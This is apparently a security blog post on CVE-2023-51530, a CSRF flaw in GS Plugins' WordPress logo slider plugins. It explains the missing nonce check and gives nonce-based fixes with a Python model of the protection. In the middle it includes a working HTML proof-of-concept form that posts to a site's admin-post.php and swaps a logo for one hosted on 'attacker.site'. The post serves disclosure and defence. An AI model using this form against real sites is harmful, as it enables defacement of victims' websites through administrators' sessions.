The Cross-Site Request Forgery (CSRF) vulnerability CVE-2023-51530 was recently discovered in the popular WordPress plugins by GS Plugins, namely Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery, and Client Logo Presentation. This vulnerability affects all versions of the plugins from N/A through 3.5.1.

In this post, we will delve deep into the details of CVE-2023-51530, providing code snippets, links to original references, and exploit details. Our objective is to help you understand the issue and enable you to take the necessary steps to protect your website or application.

Exploit Details

The CSRF vulnerability in these GS Plugins allows an attacker to trick a logged-in site administrator into executing unintended actions in the context of their session, such as adding or modifying logos. This can lead to defacement of the website or the display of unauthorized content. The root cause is that the plugin does not verify an anti-CSRF token (a WordPress nonce) before performing these state-changing actions, so any cross-site request that carries the expected fields is accepted.

Consider the following simplified example of the vulnerable code within the plugin:

<?php
// Simplified model of the vulnerable handler. The admin_post_{action} hook passes no
// arguments to the callback, so the logo ID must come from the request itself.
function gs_logo_update_logo() {
	$id        = isset($_POST['id']) ? absint($_POST['id']) : 0;
	$logo_url  = isset($_POST['logo_url']) ? sanitize_text_field($_POST['logo_url']) : '';
	$logo_name = isset($_POST['logo_name']) ? sanitize_text_field($_POST['logo_name']) : '';
	// ...
	// No nonce or referer check here: any POST carrying these fields is acted on.
	update_post_meta($id, 'logo_url', $logo_url);
	update_post_meta($id, 'logo_name', $logo_name);
	// ...
}
add_action('admin_post_gs_logo_update_logo', 'gs_logo_update_logo');

As seen in the code snippet, the $_POST values (logo_url and logo_name) are sanitized and written straight to the respective post meta entries. Sanitizing the values does not help here: because nothing checks a nonce, any page that can make the administrator's browser submit this request can trigger the update.

Proof of Concept (PoC)

An attacker can create an HTML form similar to the one below which, when submitted by a logged-in site administrator, causes the logo_url and logo_name values for a particular logo to be replaced with the attacker's chosen content.

<!DOCTYPE html>
<html>
<head>
	<title>PoC for CVE-2023-51530</title>
</head>
<body>
	<form action="http://targetsite.com/wp-admin/admin-post.php" method="POST">
		<input type="hidden" name="action" value="gs_logo_update_logo" />
		<input type="hidden" name="id" value="1234" />
		<input type="hidden" name="logo_url" value="http://attacker.site/malicious-logo.png" />
		<input type="hidden" name="logo_name" value="Malicious Logo" />
		<input type="submit" value="Click Here" />
	</form>
</body>
</html>

Mitigation

To prevent CSRF attacks on these plugins, you can implement the “nonce” mechanism provided by WordPress. By adding wp_nonce_field() to the form and verifying it with check_admin_referer() when processing the request, you add the necessary anti-CSRF protection: the nonce is tied to the logged-in user, their session and the named action, and a third-party page cannot read it, so a forged request cannot supply a valid one. Here's an example of the code changes you can make:

Form

<form method="POST" action="<?php echo esc_url(admin_url('admin-post.php')); ?>">
	<input type="hidden" name="action" value="gs_logo_update_logo" />
	<!-- Add wp_nonce_field(): emits a hidden input named gs_logo_update_nonce -->
	<?php wp_nonce_field('gs_logo_update_action', 'gs_logo_update_nonce'); ?>
	<!-- Your form fields (id, logo_url, logo_name, ...) -->
</form>

Processing Request

function gs_logo_update_logo() {
	// Verify nonce: check_admin_referer() calls wp_die() if it is missing or invalid,
	// so nothing below runs for a forged request
	check_admin_referer('gs_logo_update_action', 'gs_logo_update_nonce');
	// A nonce proves the request came from a form this site rendered for this user;
	// it does not replace an authorization check, so also confirm the user may edit
	// logos (current_user_can() with the plugin's capability)
	$id = isset($_POST['id']) ? absint($_POST['id']) : 0;
	// Process your request ...
}
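To show why the nonce check defeats the PoC form above, here is an added, runnable Python model of the WordPress nonce scheme and of the hardened handler. It is example code written for this post, not code from the plugin or from WordPress core. It follows the structure of wp_create_nonce()/wp_verify_nonce() (an HMAC over "tick|action|user ID|session token", valid for the current and previous 12-hour tick), but the salt, session token, logo store and status strings are constructed for the illustration, and the hashing is a model rather than a byte-exact reimplementation.

```python
import hashlib
import hmac
import math
import time

# Constructed secret standing in for the site's NONCE_KEY/NONCE_SALT from wp-config.php
# (assumption: any server-side secret the attacker cannot read plays the same role).
NONCE_SALT = b"constructed-salt-for-illustration-only"
NONCE_LIFE = 24 * 60 * 60  # WordPress default nonce lifetime, in seconds

# Names used by the mitigation snippet in this post.
ACTION = "gs_logo_update_action"
NONCE_FIELD = "gs_logo_update_nonce"


def nonce_tick(now=None):
    """Time bucket a nonce is bound to: ceil(now / (life / 2)), as wp_nonce_tick() does."""
    if now is None:
        now = time.time()
    return math.ceil(now / (NONCE_LIFE / 2))


def _nonce_for_tick(tick, action, user_id, session_token):
    # Hash "tick|action|uid|session token" with the nonce salt and keep 10 characters of
    # the digest; the session token ties the nonce to one login of one user.
    data = f"{tick}|{action}|{user_id}|{session_token}".encode()
    digest = hmac.new(NONCE_SALT, data, hashlib.md5).hexdigest()
    return digest[-12:-2]


def create_nonce(action, user_id, session_token, now=None):
    """Model of wp_create_nonce(): the value wp_nonce_field() writes into the form."""
    return _nonce_for_tick(nonce_tick(now), action, user_id, session_token)


def verify_nonce(nonce, action, user_id, session_token, now=None):
    """Model of wp_verify_nonce(): 1 if minted in the current tick, 2 if in the previous
    one (so a nonce stays valid for 12 to 24 hours), False for anything else."""
    if not nonce:
        return False
    tick = nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        if hmac.compare_digest(_nonce_for_tick(t, action, user_id, session_token), nonce):
            return age
    return False


def handle_logo_update(post, user_id, session_token, logos, now=None):
    """Model of the hardened admin-post handler. `post` is the parsed POST body and
    `logos` a dict standing in for post meta keyed by logo ID. Returns a status string
    instead of calling wp_die() or redirecting."""
    # Equivalent of check_admin_referer(ACTION, NONCE_FIELD): reject before touching data.
    if not verify_nonce(post.get(NONCE_FIELD), ACTION, user_id, session_token, now):
        return "rejected: missing or invalid nonce"
    try:
        logo_id = int(post.get("id", 0))
    except ValueError:
        return "rejected: bad id"
    if logo_id not in logos:
        return "rejected: unknown logo"
    logos[logo_id] = {"logo_url": post.get("logo_url", ""),
                      "logo_name": post.get("logo_name", "")}
    return "updated"


if __name__ == "__main__":
    admin_id, session = 1, "constructed-session-token"
    logos = {1234: {"logo_url": "https://example.com/logo.png", "logo_name": "Example"}}

    # The PoC form carries no nonce field, so the cross-site request changes nothing.
    forged = {"action": "gs_logo_update_logo", "id": "1234",
              "logo_url": "http://attacker.site/malicious-logo.png",
              "logo_name": "Malicious Logo"}
    print(handle_logo_update(forged, admin_id, session, logos))

    # A form the site rendered for this admin carries a nonce bound to them and the action.
    legit = dict(forged, logo_url="https://example.com/new.png", logo_name="New")
    legit[NONCE_FIELD] = create_nonce(ACTION, admin_id, session)
    print(handle_logo_update(legit, admin_id, session, logos), logos[1234])
```

The model makes the three properties that matter visible: a nonce minted for a different user, session or action verifies as False, a nonce older than two ticks expires, and a request with no nonce at all (the PoC) is rejected before any data is touched. Note that this is still only origin protection; the handler should additionally check the user's capability, as in the PHP snippet above.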

Original References

1. WordPress Plugin Vulnerabilities Database
2. Secunia Advisory
3. GS Plugins Homepage

Conclusion

We highly recommend updating to the latest version of the Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery, and Client Logo Presentation plugins to ensure your site is not exposed to CSRF attacks via CVE-2023-51530. Stay vigilant and keep your plugins updated!

Timeline

Published on: 02/29/2024 05:15:08 UTC
Last modified on: 02/29/2024 13:49:29 UTC